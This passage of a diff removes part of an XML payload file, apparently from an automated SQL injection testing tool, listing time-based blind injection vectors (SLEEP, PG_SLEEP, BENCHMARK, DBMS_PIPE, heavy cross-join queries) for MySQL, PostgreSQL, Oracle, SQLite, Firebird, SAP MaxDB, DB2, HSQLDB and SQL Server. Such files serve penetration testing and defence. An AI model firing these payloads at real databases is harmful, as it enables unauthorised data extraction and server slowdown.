-        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>SQLite &gt; 2.0 AND time-based blind (heavy query)</title>
-        <stype>5</stype>
-        <level>3</level>
-        <risk>2</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>SQLite</dbms>
-            <dbms_version>&gt; 2.0</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>SQLite &gt; 2.0 AND time-based blind (heavy query - comment)</title>
-        <stype>5</stype>
-        <level>5</level>
-        <risk>2</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>SQLite</dbms>
-            <dbms_version>&gt; 2.0</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>Firebird AND time-based blind (heavy query)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>2</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
-        <request>
-            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>Firebird</dbms>
-            <dbms_version>&gt;= 2.0</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>Firebird AND time-based blind (heavy query - comment)</title>
-        <stype>5</stype>
-        <level>5</level>
-        <risk>2</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
-        <request>
-            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>Firebird</dbms>
-            <dbms_version>&gt;= 2.0</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>SAP MaxDB AND time-based blind (heavy query)</title>
-        <stype>5</stype>
-        <level>3</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
-        <request>
-            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>SAP MaxDB</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>SAP MaxDB AND time-based blind (heavy query - comment)</title>
-        <stype>5</stype>
-        <level>5</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
-        <request>
-            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>SAP MaxDB</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>IBM DB2 AND time-based blind (heavy query)</title>
-        <stype>5</stype>
-        <level>3</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
-        <request>
-            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>IBM DB2</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>IBM DB2 AND time-based blind (heavy query - comment)</title>
-        <stype>5</stype>
-        <level>5</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
-        <request>
-            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>IBM DB2</dbms>
-        </details>
-    </test>
-    
-    <test>
-        <title>HSQLDB &gt;= 1.7.2 AND time-based blind (heavy query)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>
-        <request>
-            <payload>AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>HSQLDB</dbms>
-            <dbms_version>&gt;= 1.7.2</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>HSQLDB &gt;= 1.7.2 AND time-based blind (heavy query - comment)</title>
-        <stype>5</stype>
-        <level>5</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>
-        <request>
-            <payload>AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>HSQLDB</dbms>
-            <dbms_version>&gt;= 1.7.2</dbms_version>
-        </details>
-    </test>
-    
-    <test>
-        <title>HSQLDB &gt; 2.0 AND time-based blind (heavy query)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>
-        <request>
-            <payload>AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>HSQLDB</dbms>
-            <dbms_version>&gt; 2.0</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>HSQLDB &gt; 2.0 AND time-based blind (heavy query - comment)</title>
-        <stype>5</stype>
-        <level>5</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>
-        <request>
-            <payload>AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>HSQLDB</dbms>
-            <dbms_version>&gt; 2.0</dbms_version>
-        </details>
-    </test>
-    <!-- TODO: if possible, add payload for Microsoft Access -->
-    <!-- End of AND time-based blind tests -->
-
-    <!-- OR time-based blind tests -->
-    <test>
-        <title>MySQL &gt; 5.0.11 OR time-based blind (SELECT)</title>
-        <stype>5</stype>
-        <level>1</level>
-        <risk>3</risk>
-        <clause>1,2,3</clause>
-        <where>2</where>
-        <vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
-        <request>
-            <payload>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt; 5.0.11</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt; 5.0.11 OR time-based blind (SELECT - comment)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>3</risk>
-        <clause>1,2,3</clause>
-        <where>2</where>
-        <vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
-        <request>
-            <payload>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
-            <comment>#</comment>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt; 5.0.11</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt; 5.0.11 OR time-based blind</title>
-        <stype>5</stype>
-        <level>2</level>
-        <risk>3</risk>
-        <clause>1,2,3</clause>
-        <where>2</where>
-        <vector>OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
-        <request>
-            <payload>OR [RANDNUM]=SLEEP([SLEEPTIME])</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt; 5.0.11</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &lt; 5.0.12 OR time-based blind (heavy query)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>3</risk>
-        <clause>1,2,3</clause>
-        <where>2</where>
-        <vector>OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
-        <request>
-            <payload>OR [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>PostgreSQL &gt; 8.1 OR time-based blind</title>
-        <stype>5</stype>
-        <level>3</level>
-        <risk>3</risk>
-        <clause>1,2,3</clause>
-        <where>2</where>
-        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>OR [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>PostgreSQL</dbms>
-            <dbms_version>&gt; 8.1</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>PostgreSQL OR time-based blind (heavy query)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>3</risk>
-        <clause>1,2,3</clause>
-        <where>2</where>
-        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>PostgreSQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Microsoft SQL Server/Sybase OR time-based blind (heavy query)</title>
-        <stype>5</stype>
-        <level>3</level>
-        <risk>3</risk>
-        <clause>1,2,3</clause>
-        <where>2</where>
-        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>Microsoft SQL Server</dbms>
-            <dbms>Sybase</dbms>
-            <os>Windows</os>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle OR time-based blind</title>
-        <stype>5</stype>
-        <level>3</level>
-        <risk>3</risk>
-        <clause>1,2,3</clause>
-        <where>2</where>
-        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle OR time-based blind (heavy query)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>3</risk>
-        <clause>1,2,3</clause>
-        <where>2</where>
-        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>SQLite &gt; 2.0 OR time-based blind (heavy query)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>3</risk>
-        <clause>1</clause>
-        <where>2</where>
-        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>OR [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>SQLite</dbms>
-            <dbms_version>&gt; 2.0</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>Firebird OR time-based blind (heavy query)</title>
-        <stype>5</stype>
-        <level>5</level>
-        <risk>3</risk>
-        <clause>1</clause>
-        <where>2</where>
-        <vector>OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
-        <request>
-            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>Firebird</dbms>
-            <dbms_version>&gt;= 2.0</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>SAP MaxDB OR time-based blind (heavy query - comment)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>3</risk>
-        <clause>1,2,3</clause>
-        <where>2</where>
-        <vector>OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
-        <request>
-            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>SAP MaxDB</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>IBM DB2 OR time-based blind (heavy query)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>3</risk>
-        <clause>1,2,3</clause>
-        <where>2</where>
-        <vector>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
-        <request>
-            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>IBM DB2</dbms>
-        </details>
-    </test>
-    
-    <test>
-        <title>HSQLDB &gt;= 1.7.2 OR time-based blind (heavy query)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>
-        <request>
-            <payload>OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>HSQLDB</dbms>
-            <dbms_version>&gt;= 1.7.2</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>HSQLDB &gt;= 1.7.2 OR time-based blind (heavy query - comment)</title>
-        <stype>5</stype>
-        <level>5</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>
-        <request>
-            <payload>OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>HSQLDB</dbms>
-            <dbms_version>&gt;= 1.7.2</dbms_version>
-        </details>
-    </test>    
-    
-    <test>
-        <title>HSQLDB &gt; 2.0 OR time-based blind (heavy query)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>
-        <request>
-            <payload>OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>HSQLDB</dbms>
-            <dbms_version>&gt; 2.0</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>HSQLDB &gt; 2.0 OR time-based blind (heavy query - comment)</title>
-        <stype>5</stype>
-        <level>5</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>
-        <request>
-            <payload>OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>HSQLDB</dbms>
-            <dbms_version>&gt; 2.0</dbms_version>
-        </details>
-    </test>
-    <!-- TODO: if possible, add payload for Microsoft Access -->
-    <!-- End of OR time-based blind tests -->
-
-    <!-- Time-based tests - After ORDER BY...LIMIT... -->
-    <test>
-        <title>MySQL &gt;= 5.1 time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)</title>
-        <stype>5</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,2,3,4,5</clause>
-        <where>1</where>
-        <vector>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])))),1)</vector>
-        <request>
-            <payload>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))))),1)</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt; 5.0.11</dbms_version>
-        </details>
-    </test>
-    <!-- Time-based tests - After ORDER BY...LIMIT... -->
-
-    <!-- Time-based blind tests - Parameter replace -->
-    <test>
-        <title>MySQL &gt; 5.0.11 time-based blind - Parameter replace (SELECT)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>1</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
-        <request>
-            <payload>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt; 5.0.11</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt; 5.0.11 time-based blind - Parameter replace (SELECT - comment)</title>
-        <stype>5</stype>
-        <level>5</level>
-        <risk>1</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
-        <request>
-            <payload>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
-            <comment>#</comment>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt; 5.0.11</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt;= 5.0 time-based blind - Parameter replace</title>
-        <stype>5</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
-        <request>
-            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt;= 5.0</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &lt; 5.0 time-based blind - Parameter replace (heavy queries)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
-        <request>
-            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL time-based blind - Parameter replace (bool*int)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>1</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>([INFERENCE])*SLEEP([SLEEPTIME])</vector>
-        <request>
-            <payload>([RANDNUM]=[RANDNUM])*SLEEP([SLEEPTIME])</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL time-based blind - Parameter replace (MAKE_SET)</title>
-        <stype>5</stype>
-        <level>5</level>
-        <risk>1</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>MAKE_SET([INFERENCE],SLEEP([SLEEPTIME]))</vector>
-        <request>
-            <payload>MAKE_SET([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL time-based blind - Parameter replace (ELT)</title>
-        <stype>5</stype>
-        <level>5</level>
-        <risk>1</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
-        <request>
-            <payload>ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>PostgreSQL &gt; 8.1 time-based blind - Parameter replace</title>
-        <stype>5</stype>
-        <level>3</level>
-        <risk>1</risk>
-        <clause>1,2,3</clause>
-        <where>3</where>
-        <vector>(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>PostgreSQL</dbms>
-            <dbms_version>&gt; 8.1</dbms_version>
-        </details>
-    </test>
-
-    <test>
